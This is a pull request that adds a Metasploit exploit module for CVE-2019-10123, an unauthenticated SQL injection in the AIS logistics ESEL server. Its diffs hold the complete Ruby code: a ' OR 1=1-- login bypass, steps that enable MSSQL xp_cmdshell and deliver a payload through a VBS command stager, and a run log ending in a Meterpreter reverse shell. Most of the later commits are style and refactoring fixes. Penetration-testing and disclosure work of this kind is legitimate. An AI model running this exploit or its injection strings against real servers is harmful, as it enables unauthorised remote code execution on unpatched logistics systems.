### PR TITLE
Add an RCE exploit for the AIS logistics software 

### DIFF
--- a/documentation/modules/exploit/windows/misc/ais_esel_server_rce.md
+++ b/documentation/modules/exploit/windows/misc/ais_esel_server_rce.md
@@ -41,29 +41,29 @@
 
 ## Scenarios
 
-  msf5 > use exploit/windows/misc/ais_esel_server_rce 
-  msf5 exploit(windows/misc/ais_esel_server_rce) > set rhosts 10.66.75.212
-  rhosts => 10.66.75.212
-        msf5 exploit(windows/misc/ais_esel_server_rce) > check
-        [+] 10.66.75.212:5099 - The target is vulnerable.
-  msf5 exploit(windows/misc/ais_esel_server_rce) > run
+    msf5 > use exploit/windows/misc/ais_esel_server_rce 
+    msf5 exploit(windows/misc/ais_esel_server_rce) > set rhosts 10.66.75.212
+    rhosts => 10.66.75.212
+          msf5 exploit(windows/misc/ais_esel_server_rce) > check
+          [+] 10.66.75.212:5099 - The target is vulnerable.
+    msf5 exploit(windows/misc/ais_esel_server_rce) > run
 
-  [*] Started reverse TCP handler on 10.66.75.208:4444 
-  [+] 10.66.75.212:5099 - Correct response received => Data send succesfully
-  [+] 10.66.75.212:5099 - Correct response received => Data send succesfully
-  [*] 10.66.75.212:5099 - Command Stager progress -   1.47% done (1499/102292 bytes)
-  [+] 10.66.75.212:5099 - Correct response received => Data send succesfully
-  [*] 10.66.75.212:5099 - Command Stager progress -   2.93% done (2998/102292 bytes)
-  [+] 10.66.75.212:5099 - Correct response received => Data send succesfully
-        ...
-  [*] 10.66.75.212:5099 - Command Stager progress -  99.55% done (101827/102292 bytes)
-  [+] 10.66.75.212:5099 - Correct response received => Data send succesfully
-  [*] Sending stage (179779 bytes) to 10.66.75.212
-  [*] 10.66.75.212:5099 - Command Stager progress - 100.00% done (102292/102292 bytes)
-  [!] 10.66.75.212:5099 - The payload is left on the client in the %TEMP% Folder of the corresponding user.
-  [*] 10.66.75.212:5099 - Stager should now be executed. Waiting for 20 seconds..
-  [*] Meterpreter session 1 opened (10.66.75.208:4444 -> 10.66.75.212:57107) at 2019-03-27 11:04:29 +0100
+    [*] Started reverse TCP handler on 10.66.75.208:4444 
+    [+] 10.66.75.212:5099 - Correct response received => Data send succesfully
+    [+] 10.66.75.212:5099 - Correct response received => Data send succesfully
+    [*] 10.66.75.212:5099 - Command Stager progress -   1.47% done (1499/102292 bytes)
+    [+] 10.66.75.212:5099 - Correct response received => Data send succesfully
+    [*] 10.66.75.212:5099 - Command Stager progress -   2.93% done (2998/102292 bytes)
+    [+] 10.66.75.212:5099 - Correct response received => Data send succesfully
+          ...
+    [*] 10.66.75.212:5099 - Command Stager progress -  99.55% done (101827/102292 bytes)
+    [+] 10.66.75.212:5099 - Correct response received => Data send succesfully
+    [*] Sending stage (179779 bytes) to 10.66.75.212
+    [*] 10.66.75.212:5099 - Command Stager progress - 100.00% done (102292/102292 bytes)
+    [!] 10.66.75.212:5099 - The payload is left on the client in the %TEMP% Folder of the corresponding user.
+    [*] 10.66.75.212:5099 - Stager should now be executed. Waiting for 20 seconds..
+    [*] Meterpreter session 1 opened (10.66.75.208:4444 -> 10.66.75.212:57107) at 2019-03-27 11:04:29 +0100
 
-  meterpreter > getuid
-  Server username: NT Service\MSSQL$AIS
+    meterpreter > getuid
+    Server username: NT Service\MSSQL$AIS
 

--- a/documentation/modules/exploit/windows/misc/ais_esel_server_rce.md
+++ b/documentation/modules/exploit/windows/misc/ais_esel_server_rce.md
@@ -1,0 +1,69 @@
+## Description
+
+    This module will execute an arbitrary payload on an "ESEL" server used by the
+    AIS logistic software. The server typically listens on port 5099 without TLS.
+    There could also be server listening on 5100 with TLS but the port 5099 is
+    usually always open.
+    The login process is vulnerable to an SQL Injection. Usually a MSSQL Server
+    with the sa user is in place.
+
+    This module was verified on version 67 but it should also run on lower versions.
+    An fixed version was created by AIS in September 2017. However most systems
+    have not been updated.`
+
+    In regard to the payload, unless there is a closed port in the web server,
+    you dont want to use any bind payload. You want a "reverse" payload,
+    probably to your port 80 or to any other outbound port allowed on the firewall.
+
+    Currently, one delivery method is supported
+
+    This method takes advantage of the Command Stager subsystem. This allows using
+    various techniques, such as using a TFTP server, to send the executable. By default
+    the Command Stager uses 'wcsript.exe' to generate the executable on the target.
+
+    NOTE: This module will leave a payload executable on the target system when the
+    attack is finished.
+
+## Vulnerable Application
+
+  The application is not publicily available. It was tested on Esel version 67 but should also work an versions below.
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. `use exploit/windows/misc/ais_esel_server_rce`
+  3. `set RHOSTS <IP>`
+  4. `check`
+  5. **Verify** "Server is vulnerable"
+  6. `run`
+  7. **Verify** Session opened
+
+
+## Scenarios
+
+  msf5 > use exploit/windows/misc/ais_esel_server_rce 
+  msf5 exploit(windows/misc/ais_esel_server_rce) > set rhosts 10.66.75.212
+  rhosts => 10.66.75.212
+        msf5 exploit(windows/misc/ais_esel_server_rce) > check
+        [+] 10.66.75.212:5099 - The target is vulnerable.
+  msf5 exploit(windows/misc/ais_esel_server_rce) > run
+
+  [*] Started reverse TCP handler on 10.66.75.208:4444 
+  [+] 10.66.75.212:5099 - Correct response received => Data send succesfully
+  [+] 10.66.75.212:5099 - Correct response received => Data send succesfully
+  [*] 10.66.75.212:5099 - Command Stager progress -   1.47% done (1499/102292 bytes)
+  [+] 10.66.75.212:5099 - Correct response received => Data send succesfully
+  [*] 10.66.75.212:5099 - Command Stager progress -   2.93% done (2998/102292 bytes)
+  [+] 10.66.75.212:5099 - Correct response received => Data send succesfully
+        ...
+  [*] 10.66.75.212:5099 - Command Stager progress -  99.55% done (101827/102292 bytes)
+  [+] 10.66.75.212:5099 - Correct response received => Data send succesfully
+  [*] Sending stage (179779 bytes) to 10.66.75.212
+  [*] 10.66.75.212:5099 - Command Stager progress - 100.00% done (102292/102292 bytes)
+  [!] 10.66.75.212:5099 - The payload is left on the client in the %TEMP% Folder of the corresponding user.
+  [*] 10.66.75.212:5099 - Stager should now be executed. Waiting for 20 seconds..
+  [*] Meterpreter session 1 opened (10.66.75.208:4444 -> 10.66.75.212:57107) at 2019-03-27 11:04:29 +0100
+
+  meterpreter > getuid
+  Server username: NT Service\MSSQL$AIS
+

--- a/modules/exploits/windows/misc/ais_esel_server_rce.rb
+++ b/modules/exploits/windows/misc/ais_esel_server_rce.rb
@@ -47,7 +47,6 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'     =>
         [
           ['CVE', '2019-10123'],
-          ['URL', 'www.ais.de']
         ],
       'Platform'       => 'win',
       'Arch'           => [ ARCH_X86, ARCH_X64 ],

--- a/modules/exploits/windows/misc/ais_esel_server_rce.rb
+++ b/modules/exploits/windows/misc/ais_esel_server_rce.rb
@@ -91,7 +91,7 @@ class MetasploitModule < Msf::Exploit::Remote
       if (response.include? "Zugangsdaten Falsch") && (response.length > (length -20))
         print_good("Correct response received => Data send succesfully")
       else
-        print_warning("Wrong response received => Probably data could not be sent succesfully")
+        print_warning('Wrong response received => Probably data could not be sent successfully')
       end
     end
 

--- a/modules/exploits/windows/misc/ais_esel_server_rce.rb
+++ b/modules/exploits/windows/misc/ais_esel_server_rce.rb
@@ -54,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Arch'           => [ ARCH_X86, ARCH_X64 ],
       'Payload'        =>
         {
-          'BadChars' 	=> "\x00\xff",
+          'BadChars'  => "\x00\xff",
         },
       'Targets'        =>
         [
@@ -114,8 +114,8 @@ class MetasploitModule < Msf::Exploit::Remote
   # create a plain login message
   def create_login_msg(pw)
     delim = ["ff"].pack('H*') #255.chr(Encoding::UTF_8)
-    login_str = "#{delim}000000#{delim}20180810213226#{delim}01#{delim}60#"\
-                "{delim}02#{delim}1111#{delim}#{pw}#{delim}AAAAA#{delim}120"
+    login_str = "#{delim}000000#{delim}20180810213226#{delim}01#{delim}60"\
+                "#{delim}02#{delim}1111#{delim}#{pw}#{delim}AAAAA#{delim}120"
 
     return login_str
   end
@@ -123,11 +123,11 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
 
     response_bypass = send_login_msg(create_login_msg("2222' OR 1=1--"), false)
-    if response_bypass.include? 'Zugangsdaten OK'
-      print_good('Server is vulnerable')
-    else
-      print_error('Server does not seem to be vulnerable')
+    if response_bypass.include? 'Zugangsdaten OK'      
+      return Exploit::CheckCode::Vulnerable
+    else      
       print_status('Response was: ' + response_bypass)
+      return Exploit::CheckCode::Safe
     end
   end
 

--- a/modules/exploits/windows/misc/ais_esel_server_rce.rb
+++ b/modules/exploits/windows/misc/ais_esel_server_rce.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'     =>
         [
           ['CVE', '2019-10123'],
-          ['URL','www.ais.de']
+          ['URL', 'www.ais.de']
         ],
       'Platform'       => 'win',
       'Arch'           => [ ARCH_X86, ARCH_X64 ],
@@ -62,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'CmdStagerFlavor' => 'vbs',
 
       'DefaultTarget'  => 0,
-      'DisclosureDate' => 'Aug 30 2017',
+      'DisclosureDate' => 'Mar 27 2019',
       'DefaultOptions' =>
         {
           'RPORT' => 5099
@@ -96,10 +96,10 @@ class MetasploitModule < Msf::Exploit::Remote
       end
     end
 
+    return response
+  ensure
     # Every time a new Connection is required
     disconnect
-
-    return response
   end
 
   # embeds a sql command into the login message
@@ -117,13 +117,12 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-
     response_bypass = send_login_msg(create_login_msg("#{rand(1_000..9_999)}' OR 1=1--"), false)
     if response_bypass.include? 'Zugangsdaten OK'
-      return Exploit::CheckCode::Vulnerable
+      return CheckCode::Vulnerable
     else
       print_status("Response was: #{response_bypass}")
-      return Exploit::CheckCode::Safe
+      return CheckCode::Safe
     end
   end
 
@@ -132,14 +131,8 @@ class MetasploitModule < Msf::Exploit::Remote
     # Software uses the 'sa' user by default
     send_login_msg(create_login_msg_sql(mssql_xpcmdshell_enable))
     # The porotocol has no limites on max-data
-    execute_cmdstager({ :linemax => 5000, :nodelete => false })
+    execute_cmdstager({ :linemax => 1500, :nodelete => false })
     print_warning("The payload is left on the client in the \%TEMP\% Folder of the corresponding user.")
-
-    print_status("Stager should now be executed. Waiting for 20 seconds..")
-    select(nil, nil, nil, 20)
-
-    handler
-    disconnect
+    print_status("Stager should now be executed.")
   end
-
 end

--- a/modules/exploits/windows/misc/ais_esel_server_rce.rb
+++ b/modules/exploits/windows/misc/ais_esel_server_rce.rb
@@ -80,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def send_login_msg(login_msg, check_response = true)
     length = login_msg.length
     length += length.to_s.length
-    login_msg = length.to_s + login_msg
+    login_msg = "#{length}#{login_msg}"
 
     connect
 

--- a/modules/exploits/windows/misc/ais_esel_server_rce.rb
+++ b/modules/exploits/windows/misc/ais_esel_server_rce.rb
@@ -67,8 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
         {
           'RPORT' => 5099
         },
-      ))
-    deregister_options('SSLCert', 'URIPATH', 'SRVPORT', 'SRVHOST', 'SSL')
+      ))    
   end
 
   # This is method required for the CmdStager to work...
@@ -131,7 +130,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Software uses the 'sa' user by default
     send_login_msg(create_login_msg_sql(mssql_xpcmdshell_enable))
     # The porotocol has no limites on max-data
-    execute_cmdstager({ :linemax => 1500, :nodelete => false })
+    execute_cmdstager({ :linemax => 1500 })
     print_warning("The payload is left on the client in the \%TEMP\% Folder of the corresponding user.")
     print_status("Stager should now be executed.")
   end

--- a/modules/exploits/windows/misc/ais_esel_server_rce.rb
+++ b/modules/exploits/windows/misc/ais_esel_server_rce.rb
@@ -52,7 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Arch'           => [ ARCH_X86, ARCH_X64 ],
       'Payload'        =>
         {
-          'BadChars'  => "\x00\xff",
+          'BadChars'  => "\x00\xff\x27",
         },
       'Targets'        =>
         [

--- a/modules/exploits/windows/misc/ais_esel_server_rce.rb
+++ b/modules/exploits/windows/misc/ais_esel_server_rce.rb
@@ -120,7 +120,7 @@ class MetasploitModule < Msf::Exploit::Remote
       CheckCode::Vulnerable
     else
       print_status("Response was: #{response_bypass}")
-      return CheckCode::Safe
+      CheckCode::Safe
     end
   end
 

--- a/modules/exploits/windows/misc/ais_esel_server_rce.rb
+++ b/modules/exploits/windows/misc/ais_esel_server_rce.rb
@@ -12,8 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'AIS logistics ESEL-Server unauthenticated Payload
-        Execution via SQL Injection',
+      'Name'           => 'AIS logistics ESEL-Server Unauth SQL Injection RCE',
       'Description'    => %q{
         This module will execute an arbitrary payload on an "ESEL" server used by the
         AIS logistic software. The server typically listens on port 5099 without TLS.
@@ -103,17 +102,14 @@ class MetasploitModule < Msf::Exploit::Remote
     return response
   end
 
-  # embedds a sql command in to the login message
+  # embeds a sql command into the login message
   def create_login_msg_sql(sql_cmd)
-    sqli = "2222'; #{sql_cmd}--"
-    login_msg_sqli = create_login_msg(sqli)
-
-    return login_msg_sqli
+    return create_login_msg("#{rand(1_000..9_999)}'; #{sql_cmd}--")
   end
 
   # create a plain login message
   def create_login_msg(pw)
-    delim = ["ff"].pack('H*') #255.chr(Encoding::UTF_8)
+    delim = "\xFF"
     login_str = "#{delim}000000#{delim}20180810213226#{delim}01#{delim}60"\
                 "#{delim}02#{delim}1111#{delim}#{pw}#{delim}AAAAA#{delim}120"
 
@@ -122,21 +118,21 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
 
-    response_bypass = send_login_msg(create_login_msg("2222' OR 1=1--"), false)
-    if response_bypass.include? 'Zugangsdaten OK'
+    response_bypass = send_login_msg(create_login_msg("#{rand(1_000..9_999)}' OR 1=1--"), false)
+    if response_bypass.include? 'Zugangsdaten OK'      
       return Exploit::CheckCode::Vulnerable
-    else
-      print_status('Response was: ' + response_bypass)
+    else      
+      print_status("Response was: #{response_bypass}")
       return Exploit::CheckCode::Safe
     end
   end
 
   def exploit
-      # enable xp cmdshell, used to execute commands later
+    # enable xp cmdshell, used to execute commands later
     # Software uses the 'sa' user by default
     send_login_msg(create_login_msg_sql(mssql_xpcmdshell_enable))
     # The porotocol has no limites on max-data
-    execute_cmdstager({ :linemax => 1500, :nodelete => false })
+    execute_cmdstager({ :linemax => 5000, :nodelete => false })
     print_warning("The payload is left on the client in the \%TEMP\% Folder of the corresponding user.")
 
     print_status("Stager should now be executed. Waiting for 20 seconds..")

--- a/modules/exploits/windows/misc/ais_esel_server_rce.rb
+++ b/modules/exploits/windows/misc/ais_esel_server_rce.rb
@@ -119,9 +119,9 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
 
     response_bypass = send_login_msg(create_login_msg("#{rand(1_000..9_999)}' OR 1=1--"), false)
-    if response_bypass.include? 'Zugangsdaten OK'      
+    if response_bypass.include? 'Zugangsdaten OK'
       return Exploit::CheckCode::Vulnerable
-    else      
+    else
       print_status("Response was: #{response_bypass}")
       return Exploit::CheckCode::Safe
     end

--- a/modules/exploits/windows/misc/ais_esel_server_rce.rb
+++ b/modules/exploits/windows/misc/ais_esel_server_rce.rb
@@ -67,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
         {
           'RPORT' => 5099
         },
-      ))    
+      ))
   end
 
   # This is method required for the CmdStager to work...

--- a/modules/exploits/windows/misc/ais_esel_server_rce.rb
+++ b/modules/exploits/windows/misc/ais_esel_server_rce.rb
@@ -115,7 +115,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    response_bypass = send_login_msg(create_login_msg("#{rand(1_000..9_999)}' OR 1=1--"), false)
+    int = rand(1..1_000)
+    response_bypass = send_login_msg(create_login_msg("#{rand(1_000..9_999)}' OR #{int}=#{int}--"), false)
     if response_bypass.include? 'Zugangsdaten OK'
       CheckCode::Vulnerable
     else

--- a/modules/exploits/windows/misc/ais_esel_server_rce.rb
+++ b/modules/exploits/windows/misc/ais_esel_server_rce.rb
@@ -112,7 +112,6 @@ class MetasploitModule < Msf::Exploit::Remote
     login_str = "#{delim}000000#{delim}20180810213226#{delim}01#{delim}60"\
                 "#{delim}02#{delim}1111#{delim}#{pw}#{delim}AAAAA#{delim}120"
 
-    return login_str
   end
 
   def check

--- a/modules/exploits/windows/misc/ais_esel_server_rce.rb
+++ b/modules/exploits/windows/misc/ais_esel_server_rce.rb
@@ -123,9 +123,9 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
 
     response_bypass = send_login_msg(create_login_msg("2222' OR 1=1--"), false)
-    if response_bypass.include? 'Zugangsdaten OK'      
+    if response_bypass.include? 'Zugangsdaten OK'
       return Exploit::CheckCode::Vulnerable
-    else      
+    else
       print_status('Response was: ' + response_bypass)
       return Exploit::CheckCode::Safe
     end

--- a/modules/exploits/windows/misc/ais_esel_server_rce.rb
+++ b/modules/exploits/windows/misc/ais_esel_server_rce.rb
@@ -62,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'CmdStagerFlavor' => 'vbs',
 
       'DefaultTarget'  => 0,
-      'DisclosureDate' => 'Mar 27 2019',
+      'DisclosureDate' => '2019-03-27',
       'DefaultOptions' =>
         {
           'RPORT' => 5099

--- a/modules/exploits/windows/misc/ais_esel_server_rce.rb
+++ b/modules/exploits/windows/misc/ais_esel_server_rce.rb
@@ -132,6 +132,6 @@ class MetasploitModule < Msf::Exploit::Remote
     # The porotocol has no limites on max-data
     execute_cmdstager({ :linemax => 1500 })
     print_warning('The payload is left on the client in the \%TEMP\% Folder of the corresponding user.')
-    print_status("Stager should now be executed.")
+    print_status('Stager should now be executed.')
   end
 end

--- a/modules/exploits/windows/misc/ais_esel_server_rce.rb
+++ b/modules/exploits/windows/misc/ais_esel_server_rce.rb
@@ -131,7 +131,7 @@ class MetasploitModule < Msf::Exploit::Remote
     send_login_msg(create_login_msg_sql(mssql_xpcmdshell_enable))
     # The porotocol has no limites on max-data
     execute_cmdstager({ :linemax => 1500 })
-    print_warning("The payload is left on the client in the \%TEMP\% Folder of the corresponding user.")
+    print_warning('The payload is left on the client in the \%TEMP\% Folder of the corresponding user.')
     print_status("Stager should now be executed.")
   end
 end

--- a/modules/exploits/windows/misc/ais_esel_server_rce.rb
+++ b/modules/exploits/windows/misc/ais_esel_server_rce.rb
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if check_response
       if (response.include? 'Zugangsdaten Falsch') && (response.length > (length - 20))
-        print_good("Correct response received => Data send succesfully")
+        print_good('Correct response received => Data send successfully')
       else
         print_warning('Wrong response received => Probably data could not be sent successfully')
       end

--- a/modules/exploits/windows/misc/ais_esel_server_rce.rb
+++ b/modules/exploits/windows/misc/ais_esel_server_rce.rb
@@ -117,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     response_bypass = send_login_msg(create_login_msg("#{rand(1_000..9_999)}' OR 1=1--"), false)
     if response_bypass.include? 'Zugangsdaten OK'
-      return CheckCode::Vulnerable
+      CheckCode::Vulnerable
     else
       print_status("Response was: #{response_bypass}")
       return CheckCode::Safe

--- a/modules/exploits/windows/misc/ais_esel_server_rce.rb
+++ b/modules/exploits/windows/misc/ais_esel_server_rce.rb
@@ -60,7 +60,6 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'Automatic', { } ],
         ],
       'CmdStagerFlavor' => 'vbs',
-
       'DefaultTarget'  => 0,
       'DisclosureDate' => '2019-03-27',
       'DefaultOptions' =>

--- a/modules/exploits/windows/misc/ais_esel_server_rce.rb
+++ b/modules/exploits/windows/misc/ais_esel_server_rce.rb
@@ -1,0 +1,149 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::MSSQL_COMMANDS
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'AIS logistics ESEL-Server unauthenticated Payload
+        Execution via SQL Injection',
+      'Description'    => %q{
+        This module will execute an arbitrary payload on an "ESEL" server used by the
+        AIS logistic software. The server typically listens on port 5099 without TLS.
+        There could also be server listening on 5100 with TLS but the port 5099 is
+        usually always open.
+        The login process is vulnerable to an SQL Injection. Usually a MSSQL Server
+        with the 'sa' user is in place.
+
+        This module was verified on version 67 but it should also run on lower versions.
+        An fixed version was created by AIS in September 2017. However most systems
+        have not been updated.
+
+        In regard to the payload, unless there is a closed port in the web server,
+        you dont want to use any "bind" payload. You want a "reverse" payload,
+        probably to your port 80 or to any other outbound port allowed on the firewall.
+
+        Currently, one delivery method is supported
+
+        This method takes advantage of the Command Stager subsystem. This allows using
+        various techniques, such as using a TFTP server, to send the executable. By default
+        the Command Stager uses 'wcsript.exe' to generate the executable on the target.
+
+        NOTE: This module will leave a payload executable on the target system when the
+        attack is finished.
+
+      },
+      'Author'         =>
+        [
+          'Manuel Feifel'
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CVE', '2019-10123'],
+          ['URL','www.ais.de']
+        ],
+      'Platform'       => 'win',
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Payload'        =>
+        {
+          'BadChars' 	=> "\x00\xff",
+        },
+      'Targets'        =>
+        [
+          [ 'Automatic', { } ],
+        ],
+      'CmdStagerFlavor' => 'vbs',
+
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Aug 30 2017',
+      'DefaultOptions' =>
+        {
+          'RPORT' => 5099
+        },
+      ))
+    deregister_options('SSLCert', 'URIPATH', 'SRVPORT', 'SRVHOST', 'SSL')
+  end
+
+  # This is method required for the CmdStager to work...
+  def execute_command(cmd, _opts)
+    cmd_xp = "EXEC master..xp_cmdshell '#{cmd}'"
+    send_login_msg(create_login_msg_sql(cmd_xp))
+  end
+
+  # prepends the required length to the message and sends it to the server
+  def send_login_msg(login_msg, check_response = true)
+    length = login_msg.length
+    length += length.to_s.length
+    login_msg = length.to_s + login_msg
+
+    connect
+
+    sock.put(login_msg)
+    response = sock.recv(10000)
+
+    if check_response
+      if (response.include? "Zugangsdaten Falsch") && (response.length > (length -20))
+        print_good("Correct response received => Data send succesfully")
+      else
+        print_warning("Wrong response received => Probably data could not be sent succesfully")
+      end
+    end
+
+    # Every time a new Connection is required
+    disconnect
+
+    return response
+  end
+
+  # embedds a sql command in to the login message
+  def create_login_msg_sql(sql_cmd)
+    sqli = "2222'; #{sql_cmd}--"
+    login_msg_sqli = create_login_msg(sqli)
+
+    return login_msg_sqli
+  end
+
+  # create a plain login message
+  def create_login_msg(pw)
+    delim = ["ff"].pack('H*') #255.chr(Encoding::UTF_8)
+    login_str = "#{delim}000000#{delim}20180810213226#{delim}01#{delim}60#"\
+                "{delim}02#{delim}1111#{delim}#{pw}#{delim}AAAAA#{delim}120"
+
+    return login_str
+  end
+
+  def check
+
+    response_bypass = send_login_msg(create_login_msg("2222' OR 1=1--"), false)
+    if response_bypass.include? 'Zugangsdaten OK'
+      print_good('Server is vulnerable')
+    else
+      print_error('Server does not seem to be vulnerable')
+      print_status('Response was: ' + response_bypass)
+    end
+  end
+
+  def exploit
+      # enable xp cmdshell, used to execute commands later
+    # Software uses the 'sa' user by default
+    send_login_msg(create_login_msg_sql(mssql_xpcmdshell_enable))
+    # The porotocol has no limites on max-data
+    execute_cmdstager({ :linemax => 1500, :nodelete => false })
+    print_warning("The payload is left on the client in the \%TEMP\% Folder of the corresponding user.")
+
+    print_status("Stager should now be executed. Waiting for 20 seconds..")
+    select(nil, nil, nil, 20)
+
+    handler
+    disconnect
+  end
+
+end

--- a/modules/exploits/windows/misc/ais_esel_server_rce.rb
+++ b/modules/exploits/windows/misc/ais_esel_server_rce.rb
@@ -88,7 +88,7 @@ class MetasploitModule < Msf::Exploit::Remote
     response = sock.recv(10000)
 
     if check_response
-      if (response.include? "Zugangsdaten Falsch") && (response.length > (length -20))
+      if (response.include? 'Zugangsdaten Falsch') && (response.length > (length - 20))
         print_good("Correct response received => Data send succesfully")
       else
         print_warning('Wrong response received => Probably data could not be sent successfully')


### PR DESCRIPTION
Add an RCE exploit for the AIS logistics software (www.ais.de). It exploits a SQL injection on the backend of their mobile app.

       This module will execute an arbitrary payload on an "ESEL" server used by the
        AIS logistic software. The server typically listens on port 5099 without TLS.
        There could also be server listening on 5100 with TLS but the port 5099 is
        usually always open.
        The login process is vulnerable to an SQL Injection. Usually a MSSQL Server
        with the sa user is in place.

        This module was verified on version 67 but it should also run on lower versions.
        An fixed version was created by AIS in September 2017. However most systems
        have not been updated.`

        In regard to the payload, unless there is a closed port in the web server,
        you dont want to use any bind payload. You want a "reverse" payload,
        probably to your port 80 or to any other outbound port allowed on the firewall.

        Currently, one delivery method is supported

        This method takes advantage of the Command Stager subsystem. This allows using
        various techniques, such as using a TFTP server, to send the executable. By default
        the Command Stager uses 'wcsript.exe' to generate the executable on the target.

        NOTE: This module will leave a payload executable on the target system when the
        attack is finished.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/misc/ais_esel_server_rce`
- [ ] `set RHOSTS <IP>`
- [ ] `check`
- [ ] **Verify** "Server is vulnerable"
- [ ] `run`
- [ ] **Verify** Session opened

## Scenarios
	msf5 > use exploit/windows/misc/ais_esel_server_rce 
	msf5 exploit(windows/misc/ais_esel_server_rce) > set rhosts 10.66.75.212
	rhosts => 10.66.75.212
        msf5 exploit(windows/misc/ais_esel_server_rce) > check
        [+] 10.66.75.212:5099 - The target is vulnerable.
	msf5 exploit(windows/misc/ais_esel_server_rce) > run

	[*] Started reverse TCP handler on 10.66.75.208:4444 
	[+] 10.66.75.212:5099 - Correct response received => Data send succesfully
	[+] 10.66.75.212:5099 - Correct response received => Data send succesfully
	[*] 10.66.75.212:5099 - Command Stager progress -   1.47% done (1499/102292 bytes)
	[+] 10.66.75.212:5099 - Correct response received => Data send succesfully
	[*] 10.66.75.212:5099 - Command Stager progress -   2.93% done (2998/102292 bytes)
	[+] 10.66.75.212:5099 - Correct response received => Data send succesfully
        ...
	[*] 10.66.75.212:5099 - Command Stager progress -  99.55% done (101827/102292 bytes)
	[+] 10.66.75.212:5099 - Correct response received => Data send succesfully
	[*] Sending stage (179779 bytes) to 10.66.75.212
	[*] 10.66.75.212:5099 - Command Stager progress - 100.00% done (102292/102292 bytes)
	[!] 10.66.75.212:5099 - The payload is left on the client in the %TEMP% Folder of the corresponding user.
	[*] 10.66.75.212:5099 - Stager should now be executed. Waiting for 20 seconds..
	[*] Meterpreter session 1 opened (10.66.75.208:4444 -> 10.66.75.212:57107) at 2019-03-27 11:04:29 +0100

	meterpreter > getuid
	Server username: NT Service\MSSQL$AIS


